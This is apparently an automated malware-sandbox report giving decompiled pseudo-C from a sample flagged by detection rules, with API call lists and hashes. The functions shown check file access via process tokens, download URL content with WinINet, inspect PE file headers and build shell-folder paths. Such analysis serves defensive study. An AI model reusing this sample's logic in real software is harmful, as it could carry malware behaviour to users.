                                                                    					_t74 = E0041DAE4(_t71, _t72, _t74, _v52);
                                                                    					if(_t74 != 0 && GetFileSecurityA(_t72, 7, _t74, _v52,  &_v52) != 0) {
                                                                    						_v56 = 0;
                                                                    						if(OpenProcessToken(GetCurrentProcess(), 0x2000e,  &_v56) != 0) {
                                                                    							_v60 = 0;
                                                                    							if(DuplicateToken(_v56, 2,  &_v60) != 0) {
                                                                    								asm("stosd");
                                                                    								asm("stosd");
                                                                    								asm("stosd");
                                                                    								_v48.PrivilegeCount = 0;
                                                                    								_t72 =  &(_v48.Control);
                                                                    								asm("stosd");
                                                                    								asm("stosd");
                                                                    								asm("stosd");
                                                                    								asm("stosd");
                                                                    								_v68 = 0;
                                                                    								_v72 = 0x14;
                                                                    								_v64 = 0;
                                                                    								_v28.GenericRead = 0x120089;
                                                                    								_v28.GenericWrite = 0x120116;
                                                                    								_v28.GenericExecute = 0x1200a0;
                                                                    								_v28.GenericAll = 0x1f01ff;
                                                                    								MapGenericMask( &_a4,  &_v28);
                                                                    								if(AccessCheck(_t74, _v60, _a4,  &_v28,  &_v48,  &_v72,  &_v68,  &_v64) != 0) {
                                                                    									_t65 = 0 | _v64 == 0x00000001;
                                                                    								}
                                                                    								CloseHandle(_v60);
                                                                    							}
                                                                    							CloseHandle(_v56);
                                                                    						}
                                                                    						E0041DAAA(_t74);
                                                                    					}
                                                                    				}
                                                                    				return E0041DA9B(_t65 & 0x000000ff, _t65, _v12 ^ _t75, _t71, _t72, _t74);
                                                                    			}

                                                                    APIs
                                                                    • GetFileSecurityA.ADVAPI32(?,00000007,00000000,00000000,?), ref: 00409427
                                                                    • GetLastError.KERNEL32(?,00000007,00000000,00000000,?), ref: 00409435
                                                                    • _malloc.LIBCMT ref: 00409447
                                                                      • Part of subcall function 0041DAE4: __FF_MSGBANNER.LIBCMT ref: 0041DAFD
                                                                      • Part of subcall function 0041DAE4: __NMSG_WRITE.LIBCMT ref: 0041DB04
                                                                      • Part of subcall function 0041DAE4: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,00403F3E,00000010), ref: 0041DB29
                                                                    • GetFileSecurityA.ADVAPI32(?,00000007,00000000,?,?), ref: 00409462
                                                                    • GetCurrentProcess.KERNEL32(0002000E,?,?,00000007,00000000,?,?,?,00000007,00000000,00000000,?), ref: 0040947C
                                                                    • OpenProcessToken.ADVAPI32(00000000,?,00000007,00000000,?,?,?,00000007,00000000,00000000,?), ref: 00409483
                                                                    • DuplicateToken.ADVAPI32(?,00000002,?,?,00000007,00000000,?,?,?,00000007,00000000,00000000,?), ref: 0040949D
                                                                    • MapGenericMask.ADVAPI32(?,?,?,00000007,00000000,?,?,?,00000007,00000000,00000000,?), ref: 004094F0
                                                                    • AccessCheck.ADVAPI32(00000000,?,?,00120089,?,00000014,?,?,?,00000007,00000000,?,?,?,00000007,00000000), ref: 00409511
                                                                    • CloseHandle.KERNEL32(?,?,00000007,00000000,?,?,?,00000007,00000000,00000000,?), ref: 00409525
                                                                    • CloseHandle.KERNEL32(?,?,00000007,00000000,?,?,?,00000007,00000000,00000000,?), ref: 0040952E
                                                                    • _free.LIBCMT ref: 00409535
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseFileHandleProcessSecurityToken$AccessAllocateCheckCurrentDuplicateErrorGenericHeapLastMaskOpen_free_malloc
                                                                    • String ID:
                                                                    • API String ID: 1304225167-0
                                                                    • Opcode ID: 5000e1eb01f3d1369351d1f19aafc8d8fa967190e9d6bcc6a5afd883dac0db86
                                                                    • Instruction ID: cd591ed8071c4faaeab0ff4fdcbcbc3ab9b1806a47f59e6685ff706f4dc3d821
                                                                    • Opcode Fuzzy Hash: 5000e1eb01f3d1369351d1f19aafc8d8fa967190e9d6bcc6a5afd883dac0db86
                                                                    • Instruction Fuzzy Hash: 6641F776900218BFDF11DFE5ED849EEBBB8BF09340F45413AF601E2161DB749A448B65
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 50%
                                                                    			E0040DE3A(char* __ecx, void* __eflags) {
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				signed int _t23;
                                                                    				void* _t36;
                                                                    				char* _t42;
                                                                    				void* _t43;
                                                                    				void* _t44;
                                                                    				void* _t54;
                                                                    				void* _t55;
                                                                    				void* _t56;
                                                                    				void* _t59;
                                                                    				signed int _t60;
                                                                    				void* _t62;
                                                                    
                                                                    				_t60 = _t62 - 0x398;
                                                                    				_t23 =  *0x443674; // 0x393162b1
                                                                    				 *(_t60 + 0x394) = _t23 ^ _t60;
                                                                    				_t42 = __ecx;
                                                                    				_push("https");
                                                                    				 *(_t60 - 0x70) = 1;
                                                                    				 *((intOrPtr*)(_t60 - 0x78)) = 0;
                                                                    				_push(E0040D694(__ecx, 1, 0));
                                                                    				if( *0x446458() == 0) {
                                                                    					 *((intOrPtr*)(_t60 - 0x78)) = 1;
                                                                    				}
                                                                    				 *((intOrPtr*)(_t60 - 0x74)) = HeapAlloc(GetProcessHeap(), 0, 0x5f5e0ff);
                                                                    				_t54 = InternetOpenA(0x43c8d8, 0, 0, 0, 0);
                                                                    				 *(_t60 - 0x7c) = _t54;
                                                                    				 *(_t60 - 0x80) = 0x927c0;
                                                                    				InternetSetOptionA(_t54, 2, _t60 - 0x80, 4);
                                                                    				_push(0);
                                                                    				if( *((intOrPtr*)(_t60 - 0x78)) == 0) {
                                                                    					_push(0x4000100);
                                                                    				} else {
                                                                    					_push(0x4800100);
                                                                    				}
                                                                    				_t43 = InternetOpenUrlA(_t54, _t42, 0, 0, ??, ??);
                                                                    				_t55 = 0;
                                                                    				while( *(_t60 - 0x70) > 0) {
                                                                    					InternetReadFile(_t43, _t60 - 0x6c, 0x400, _t60 - 0x70);
                                                                    					_t36 = 0;
                                                                    					if( *(_t60 - 0x70) > 0) {
                                                                    						do {
                                                                    							 *((char*)(_t55 +  *((intOrPtr*)(_t60 - 0x74)))) =  *((intOrPtr*)(_t60 + _t36 - 0x6c));
                                                                    							_t55 = _t55 + 1;
                                                                    							_t36 = _t36 + 1;
                                                                    						} while (_t36 <  *(_t60 - 0x70));
                                                                    						continue;
                                                                    					}
                                                                    					break;
                                                                    				}
                                                                    				InternetCloseHandle(_t43);
                                                                    				InternetCloseHandle( *(_t60 - 0x7c));
                                                                    				_pop(_t56);
                                                                    				_pop(_t59);
                                                                    				_pop(_t44);
                                                                    				return E0041DA9B( *((intOrPtr*)(_t60 - 0x74)), _t44,  *(_t60 + 0x394) ^ _t60, _t55, _t56, _t59);
                                                                    			}

                                                                    APIs
                                                                      • Part of subcall function 0040D694: _memset.LIBCMT ref: 0040D6AF
                                                                      • Part of subcall function 0040D694: _memset.LIBCMT ref: 0040D6BC
                                                                      • Part of subcall function 0040D694: lstrlen.KERNEL32(00000000,10000000,?), ref: 0040D6E2
                                                                      • Part of subcall function 0040D694: InternetCrackUrlA.WININET(00000000,00000000), ref: 0040D6EA
                                                                    • StrCmpCA.SHLWAPI(00000000,https,004442DC,?,00000000), ref: 0040DE70
                                                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040DE83
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040DE8A
                                                                    • InternetOpenA.WININET(0043C8D8,00000000,00000000,00000000,00000000), ref: 0040DE9C
                                                                    • InternetSetOptionA.WININET(00000000,00000002,?,00000004), ref: 0040DEB7
                                                                    • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,04000100,00000000), ref: 0040DED3
                                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040DEED
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040DF11
                                                                    • InternetCloseHandle.WININET(?), ref: 0040DF1A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Internet$CloseHandleHeapOpen_memset$AllocCrackFileOptionProcessReadlstrlen
                                                                    • String ID: https
                                                                    • API String ID: 73800822-1056335270
                                                                    • Opcode ID: 1d0c6895805592d6e6583423363ed62a85c2b5370f0b85be95688998276abe5f
                                                                    • Instruction ID: d08c8a8476cafad2ce87738ccbbde315399448c613f2ae02c633d8655c59d400
                                                                    • Opcode Fuzzy Hash: 1d0c6895805592d6e6583423363ed62a85c2b5370f0b85be95688998276abe5f
                                                                    • Instruction Fuzzy Hash: D3317075900218ABDB219FB19C499AFBBBCFF4B711F20042AF515A7241CB7449058BA9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 95%
                                                                    			E0041BDB5(void* __ecx, signed int __edx, signed short* _a4, long* _a8, signed int* _a12) {
                                                                    				signed int _v8;
                                                                    				intOrPtr _v36;
                                                                    				intOrPtr _v44;
                                                                    				intOrPtr _v52;
                                                                    				struct _BY_HANDLE_FILE_INFORMATION _v60;
                                                                    				signed short _v64;
                                                                    				void _v68;
                                                                    				long _v72;
                                                                    				long _v76;
                                                                    				void _v80;
                                                                    				long* _v84;
                                                                    				signed int* _v88;
                                                                    				signed short* _v92;
                                                                    				void _v96;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				signed int _t75;
                                                                    				signed int _t85;
                                                                    				long _t86;
                                                                    				signed short* _t87;
                                                                    				long* _t88;
                                                                    				void* _t89;
                                                                    				long _t107;
                                                                    				void _t112;
                                                                    				signed int* _t113;
                                                                    				signed char _t115;
                                                                    				signed int _t124;
                                                                    				signed int _t127;
                                                                    
                                                                    				_t124 = __edx;
                                                                    				_t75 =  *0x443674; // 0x393162b1
                                                                    				_v8 = _t75 ^ _t127;
                                                                    				_v92 = _a4;
                                                                    				_v84 = _a8;
                                                                    				_v88 = _a12;
                                                                    				_t126 = __ecx;
                                                                    				_t113 = __edx;
                                                                    				if(GetFileInformationByHandle(__ecx,  &_v60) != 0) {
                                                                    					_t115 = _v60.dwFileAttributes;
                                                                    					_t125 = 0;
                                                                    					_v68 = _t115;
                                                                    					_t11 =  &_v68;
                                                                    					 *_t11 = _v68 & 1;
                                                                    					_v64 = 0;
                                                                    					if( *_t11 != 0) {
                                                                    						_v64 = 1;
                                                                    					}
                                                                    					if((_t115 & 0x00000002) != 0) {
                                                                    						_v64 = _v64 | 0x00000002;
                                                                    					}
                                                                    					if((_t115 & 0x00000004) != 0) {
                                                                    						_v64 = _v64 | 0x00000004;
                                                                    					}
                                                                    					_t85 = _t115 & 0x00000010;
                                                                    					if(_t85 != 0) {
                                                                    						_v64 = _v64 | 0x00000010;
                                                                    					}
                                                                    					if((_t115 & 0x00000020) != 0) {
                                                                    						_v64 = _v64 | 0x00000020;
                                                                    					}
                                                                    					if(_t85 == _t125) {
                                                                    						_v64 = _v64 | 0x80000000;
                                                                    					} else {
                                                                    						_v64 = _v64 | 0x40000000;
                                                                    					}
                                                                    					_v64 = _v64 | 0x01000000;
                                                                    					if(_v68 == _t125) {
                                                                    						_v64 = _v64 | 0x00800000;
                                                                    					}
                                                                    					_t86 = GetFileSize(_t126, _t125);
                                                                    					_v76 = _t86;
                                                                    					if(_t86 > 0x28) {
                                                                    						SetFilePointer(_t126, _t125, _t125, _t125);
                                                                    						ReadFile(_t126,  &_v68, 2,  &_v72, _t125);
                                                                    						SetFilePointer(_t126, 0x24, _t125, _t125);
                                                                    						ReadFile(_t126,  &_v80, 4,  &_v72, _t125);
                                                                    						if(_v68 == 0x54ad) {
                                                                    							_t107 = _v80;
                                                                    							if(_v76 > _t107 + 0x34) {
                                                                    								SetFilePointer(_t126, _t107, _t125, _t125);
                                                                    								ReadFile(_t126,  &_v96, 4,  &_v72, _t125);
                                                                    								_t112 = _v96;
                                                                    								if(_t112 == 0x5a4d || _t112 == 0x454e || _t112 == 0x454c || _t112 == 0x4550) {
                                                                    									_v64 = _v64 | 0x00400000;
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    					_t87 = _v92;
                                                                    					if(_t87 != _t125) {
                                                                    						 *_t87 = _v64;
                                                                    					}
                                                                    					_t88 = _v84;
                                                                    					if(_t88 != _t125) {
                                                                    						 *_t88 = _v76;
                                                                    					}
                                                                    					if(_t113 != _t125) {
                                                                    						 *_t113 = E0041BD2C(_v60.ftLastAccessTime, _v44);
                                                                    						_t113[1] = _t124;
                                                                    						_t113[2] = E0041BD2C(_v60.ftLastWriteTime, _v36);
                                                                    						_t113[3] = _t124;
                                                                    						_t113[4] = E0041BD2C(_v60.ftCreationTime, _v52);
                                                                    						_t113[5] = _t124;
                                                                    					}
                                                                    					_t113 = _v88;
                                                                    					if(_t113 != _t125) {
                                                                    						_push(_v36);
                                                                    						_t125 =  &_v64;
                                                                    						_t126 =  &_v68;
                                                                    						E0041BD4E( &_v64,  &_v68, _v60.ftLastWriteTime);
                                                                    						 *_t113 = (_v68 & 0x0000ffff) << 0x00000010 | _v64 & 0x0000ffff;
                                                                    					}
                                                                    					_t89 = 0;
                                                                    					goto L34;
                                                                    				} else {
                                                                    					_t89 = 0x200;
                                                                    					L34:
                                                                    					return E0041DA9B(_t89, _t113, _v8 ^ _t127, _t124, _t125, _t126);
                                                                    				}
                                                                    			}


                                                                    APIs
                                                                    • GetFileInformationByHandle.KERNEL32(?,?,00000000,?,?), ref: 0041BDE3
                                                                    • GetFileSize.KERNEL32(?,00000000), ref: 0041BE5C
                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0041BE72
                                                                    • ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 0041BE84
                                                                    • SetFilePointer.KERNEL32(?,00000024,00000000,00000000), ref: 0041BE8F
                                                                    • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0041BEA1
                                                                    • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 0041BEC1
                                                                    • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0041BED3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$PointerRead$HandleInformationSize
                                                                    • String ID:
                                                                    • API String ID: 2979504256-3916222277
                                                                    • Opcode ID: 9cb83fd6e66bf42e0ea93347eca92141613ad83602980230ebbcfd3161814d6c
                                                                    • Instruction ID: da7114c1862363709ce54fdb090f57f1f79d446b9b0ab90a52d138025d07637a
                                                                    • Opcode Fuzzy Hash: 9cb83fd6e66bf42e0ea93347eca92141613ad83602980230ebbcfd3161814d6c
                                                                    • Instruction Fuzzy Hash: EE517B71D00218AFDB19DF99DC85AEEBBB5FF49700F14402AF601E6261D7389981CFA8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 89%
                                                                    			E0041497A(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                    				intOrPtr _t19;
                                                                    				void* _t23;
                                                                    				intOrPtr _t38;
                                                                    				void* _t43;
                                                                    
                                                                    				_push(0x14);
                                                                    				E004207D5(E004338D8, __ebx, __edi, __esi);
                                                                    				E0041D5BD(_t43 - 0x14, 0);
                                                                    				 *(_t43 - 4) =  *(_t43 - 4) & 0x00000000;
                                                                    				_t38 =  *0x446728; // 0x0
                                                                    				 *((intOrPtr*)(_t43 - 0x10)) = _t38;
                                                                    				_t19 = E0040E116( *((intOrPtr*)(_t43 + 8)), E0040E063(_t43 - 0x14, 0x456f38));
                                                                    				_t42 = _t19;
                                                                    				if(_t19 == 0) {
                                                                    					if(_t38 == 0) {
                                                                    						_push( *((intOrPtr*)(_t43 + 8)));
                                                                    						_t23 = E00414A4B(_t43 - 0x10, _t42, __eflags);
                                                                    						__eflags = _t23 - 0xffffffff;
                                                                    						if(_t23 == 0xffffffff) {
                                                                    							E0041DC67(_t43 - 0x20, "bad cast");
                                                                    							E0041FF86(_t43 - 0x20, 0x440cfc);
                                                                    						}
                                                                    						_t42 =  *((intOrPtr*)(_t43 - 0x10));
                                                                    						 *0x446728 =  *((intOrPtr*)(_t43 - 0x10));
                                                                    						E0040E094( *((intOrPtr*)(_t43 - 0x10)));
                                                                    						E0041D21C(__eflags, _t42);
                                                                    					} else {
                                                                    						_t42 = _t38;
                                                                    					}
                                                                    				}
                                                                    				 *(_t43 - 4) =  *(_t43 - 4) | 0xffffffff;
                                                                    				E0041D5E5(_t43 - 0x14);
                                                                    				return E00420874(_t42);
                                                                    			}


                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00414981
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0041498B
                                                                      • Part of subcall function 0040E063: std::_Lockit::_Lockit.LIBCPMT ref: 0040E071
                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 004149D8
                                                                    • __CxxThrowException@8.LIBCMT ref: 004149E6
                                                                    • std::locale::facet::_Incref.LIBCPMT ref: 004149F6
                                                                    • std::locale::facet::_Facet_Register.LIBCPMT ref: 004149FC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_H_prolog3IncrefRegisterThrowstd::bad_exception::bad_exception
                                                                    • String ID: 8oE$bad cast
                                                                    • API String ID: 158301680-3540328213
                                                                    • Opcode ID: af14d10a6f90571a5d564b4f279d6e9e662d9b7295b4f032a6ec7bb26ff750a4
                                                                    • Instruction ID: 7dfa32ef5742560436fe47dadaaff3196923bb6f2707543519836ec9562e1b44
                                                                    • Opcode Fuzzy Hash: af14d10a6f90571a5d564b4f279d6e9e662d9b7295b4f032a6ec7bb26ff750a4
                                                                    • Instruction Fuzzy Hash: 4201A171E4022497CB00EB65D8426EE76606F44768F51066BF410772D1EB7C9E4587DD
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 89%
                                                                    			E00418678(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                    				intOrPtr _t19;
                                                                    				void* _t23;
                                                                    				intOrPtr _t39;
                                                                    				void* _t44;
                                                                    
                                                                    				_push(0x14);
                                                                    				E004207D5(E004338D8, __ebx, __edi, __esi);
                                                                    				E0041D5BD(_t44 - 0x14, 0);
                                                                    				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
                                                                    				_t39 =  *0x44672c; // 0x4be15b8
                                                                    				 *((intOrPtr*)(_t44 - 0x10)) = _t39;
                                                                    				_t19 = E0040E116( *((intOrPtr*)(_t44 + 8)), E0040E063(_t44 - 0x14, 0x456f3c));
                                                                    				_t43 = _t19;
                                                                    				if(_t19 == 0) {
                                                                    					if(_t39 == 0) {
                                                                    						_push( *((intOrPtr*)(_t44 + 8)));
                                                                    						_t23 = E004187B0(_t44 - 0x10, __edx, _t43, __eflags);
                                                                    						__eflags = _t23 - 0xffffffff;
                                                                    						if(_t23 == 0xffffffff) {
                                                                    							E0041DC67(_t44 - 0x20, "bad cast");
                                                                    							E0041FF86(_t44 - 0x20, 0x440cfc);
                                                                    						}
                                                                    						_t43 =  *((intOrPtr*)(_t44 - 0x10));
                                                                    						 *0x44672c =  *((intOrPtr*)(_t44 - 0x10));
                                                                    						E0040E094( *((intOrPtr*)(_t44 - 0x10)));
                                                                    						E0041D21C(__eflags, _t43);
                                                                    					} else {
                                                                    						_t43 = _t39;
                                                                    					}
                                                                    				}
                                                                    				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
                                                                    				E0041D5E5(_t44 - 0x14);
                                                                    				return E00420874(_t43);
                                                                    			}


                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0041867F
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00418689
                                                                      • Part of subcall function 0040E063: std::_Lockit::_Lockit.LIBCPMT ref: 0040E071
                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 004186D6
                                                                    • __CxxThrowException@8.LIBCMT ref: 004186E4
                                                                    • std::locale::facet::_Incref.LIBCPMT ref: 004186F4
                                                                    • std::locale::facet::_Facet_Register.LIBCPMT ref: 004186FA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_H_prolog3IncrefRegisterThrowstd::bad_exception::bad_exception
                                                                    • String ID: <oE$bad cast
                                                                    • API String ID: 158301680-3489866858
                                                                    • Opcode ID: e64cfd71f690377aa4d18cf06f4c0f58cd48746f6fe212d3e73d2cc5178f4212
                                                                    • Instruction ID: 3ad4f98fd10a7e7e96103baa1278d85e7d0709abde918220fe342f3cf83fce33
                                                                    • Opcode Fuzzy Hash: e64cfd71f690377aa4d18cf06f4c0f58cd48746f6fe212d3e73d2cc5178f4212
                                                                    • Instruction Fuzzy Hash: D401A175E0022497CB01EB65CC426EDB6606F44328F61026FF420B72D1EB7C9E4587DD
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 89%
                                                                    			E00418714(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                    				intOrPtr _t19;
                                                                    				void* _t23;
                                                                    				intOrPtr _t38;
                                                                    				void* _t43;
                                                                    
                                                                    				_push(0x14);
                                                                    				E004207D5(E004338D8, __ebx, __edi, __esi);
                                                                    				E0041D5BD(_t43 - 0x14, 0);
                                                                    				 *(_t43 - 4) =  *(_t43 - 4) & 0x00000000;
                                                                    				_t38 =  *0x446730; // 0x4be15e0
                                                                    				 *((intOrPtr*)(_t43 - 0x10)) = _t38;
                                                                    				_t19 = E0040E116( *((intOrPtr*)(_t43 + 8)), E0040E063(_t43 - 0x14, 0x456f40));
                                                                    				_t42 = _t19;
                                                                    				if(_t19 == 0) {
                                                                    					if(_t38 == 0) {
                                                                    						_push( *((intOrPtr*)(_t43 + 8)));
                                                                    						_t23 = E00418835(_t43 - 0x10, _t42, __eflags);
                                                                    						__eflags = _t23 - 0xffffffff;
                                                                    						if(_t23 == 0xffffffff) {
                                                                    							E0041DC67(_t43 - 0x20, "bad cast");
                                                                    							E0041FF86(_t43 - 0x20, 0x440cfc);
                                                                    						}
                                                                    						_t42 =  *((intOrPtr*)(_t43 - 0x10));
                                                                    						 *0x446730 =  *((intOrPtr*)(_t43 - 0x10));
                                                                    						E0040E094( *((intOrPtr*)(_t43 - 0x10)));
                                                                    						E0041D21C(__eflags, _t42);
                                                                    					} else {
                                                                    						_t42 = _t38;
                                                                    					}
                                                                    				}
                                                                    				 *(_t43 - 4) =  *(_t43 - 4) | 0xffffffff;
                                                                    				E0041D5E5(_t43 - 0x14);
                                                                    				return E00420874(_t42);
                                                                    			}








                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0041871B
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00418725
                                                                      • Part of subcall function 0040E063: std::_Lockit::_Lockit.LIBCPMT ref: 0040E071
                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 00418772
                                                                    • __CxxThrowException@8.LIBCMT ref: 00418780
                                                                    • std::locale::facet::_Incref.LIBCPMT ref: 00418790
                                                                    • std::locale::facet::_Facet_Register.LIBCPMT ref: 00418796
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_H_prolog3IncrefRegisterThrowstd::bad_exception::bad_exception
                                                                    • String ID: @oE$bad cast
                                                                    • API String ID: 158301680-4047759391
                                                                    • Opcode ID: 4d8b436ed37fb1d6c80e8963dd5f7f08f93c7286953596e0642b70bb6cc5bb3b
                                                                    • Instruction ID: f9aee639c2379cdf8ef5bd9fece0c91fa23d90cd98dfe83eb1ebeff7589e9246
                                                                    • Opcode Fuzzy Hash: 4d8b436ed37fb1d6c80e8963dd5f7f08f93c7286953596e0642b70bb6cc5bb3b
                                                                    • Instruction Fuzzy Hash: DC018E31D4022597CB00EB65DC826EE72706B40328F61066FF820772D2EF7C9E45879D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 93%
                                                                    			E00412B55(void* __ebx, CHAR* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                    				intOrPtr* _t71;
                                                                    				WCHAR* _t77;
                                                                    				signed char _t78;
                                                                    				intOrPtr _t95;
                                                                    				intOrPtr _t102;
                                                                    				CHAR* _t104;
                                                                    				void* _t110;
                                                                    				intOrPtr _t112;
                                                                    				void* _t115;
                                                                    
                                                                    				_t102 = __edx;
                                                                    				_push(0x264);
                                                                    				E0042083E(E00434DCE, __ebx, __edi, __esi);
                                                                    				 *((intOrPtr*)(_t115 - 0x26c)) =  *((intOrPtr*)(_t115 + 8));
                                                                    				_t92 = 0;
                                                                    				 *((intOrPtr*)(_t115 - 0x264)) =  *((intOrPtr*)(_t115 + 0xc));
                                                                    				_t104 = __ecx;
                                                                    				 *((intOrPtr*)(_t115 - 0x260)) = 0;
                                                                    				 *((intOrPtr*)(_t115 - 0x25c)) = 0;
                                                                    				E00426300(_t115 - 0x220, 0, 0x104);
                                                                    				lstrcatA(_t115 - 0x220, E00416617(0, _t104, 0x104, 0x1c));
                                                                    				lstrcatA(_t115 - 0x220, _t104);
                                                                    				E00426300(_t115 - 0x118, 0, 0x104);
                                                                    				lstrcatA(_t115 - 0x118, _t115 - 0x220);
                                                                    				lstrcatA(_t115 - 0x118, 0x43c8e0);
                                                                    				lstrcatA(_t115 - 0x118,  *0x445cec);
                                                                    				_t71 = _t115 - 0x118;
                                                                    				 *((intOrPtr*)(_t115 - 0x228)) = 0xf;
                                                                    				 *((intOrPtr*)(_t115 - 0x22c)) = 0;
                                                                    				 *((char*)(_t115 - 0x23c)) = 0;
                                                                    				_t110 = _t71 + 1;
                                                                    				do {
                                                                    					_t95 =  *_t71;
                                                                    					_t71 = _t71 + 1;
                                                                    					_t121 = _t95;
                                                                    				} while (_t95 != 0);
                                                                    				E00404396(_t115 - 0x23c, _t121, _t115 - 0x118, _t71 - _t110);
                                                                    				 *(_t115 - 4) = 0;
                                                                    				_t77 = E004160E8(_t115 - 0x23c, _t115 - 0x258);
                                                                    				if(_t77[0xa] >= 8) {
                                                                    					_t77 =  *_t77;
                                                                    				}
                                                                    				_t78 = GetFileAttributesW(_t77);
                                                                    				if(_t78 == 0xffffffff) {
                                                                    					L6:
                                                                    					 *((intOrPtr*)(_t115 - 0x268)) = _t92;
                                                                    					goto L7;
                                                                    				} else {
                                                                    					 *((intOrPtr*)(_t115 - 0x268)) = 1;
                                                                    					if((_t78 & 0x00000010) == 0) {
                                                                    						L7:
                                                                    						_t111 = _t115 - 0x258;
                                                                    						E0040C148(0, _t115 - 0x258, 1);
                                                                    						 *(_t115 - 4) =  *(_t115 - 4) | 0xffffffff;
                                                                    						E00404354(_t115 - 0x23c, 1, _t92);
                                                                    						_t125 =  *((intOrPtr*)(_t115 - 0x268)) - _t92;
                                                                    						if( *((intOrPtr*)(_t115 - 0x268)) != _t92) {
                                                                    							_push(_t115 - 0x25c);
                                                                    							_push(_t115 - 0x118);
                                                                    							if(E0040E6CB(_t92, _t115 - 0x260, 0, _t111, _t125) == 0) {
                                                                    								E0040E631(_t115 - 0x260, _t115 - 0x25c);
                                                                    							}
                                                                    						}
                                                                    						_t112 =  *((intOrPtr*)(_t115 - 0x26c));
                                                                    						E004101E9(_t112, _t102, 0x43c8d8, _t115 - 0x220,  *((intOrPtr*)(_t115 - 0x264)),  *((intOrPtr*)(_t115 - 0x260)),  *((intOrPtr*)(_t115 - 0x25c)),  *((intOrPtr*)(_t112 + 0x20)));
                                                                    						if( *((intOrPtr*)(_t112 + 6)) != _t92) {
                                                                    							_t92 = 0;
                                                                    							E00412592(0, _t112, _t115 - 0x220,  *((intOrPtr*)(_t115 - 0x264)));
                                                                    						}
                                                                    						E0040E631(_t115 - 0x260, _t115 - 0x25c);
                                                                    						return E00420888(_t92, _t115 - 0x260, _t115 - 0x25c);
                                                                    					}
                                                                    					goto L6;
                                                                    				}
                                                                    			}













                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 00412B5F
                                                                    • _memset.LIBCMT ref: 00412B94
                                                                      • Part of subcall function 00416617: _memset.LIBCMT ref: 00416638
                                                                      • Part of subcall function 00416617: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00416650
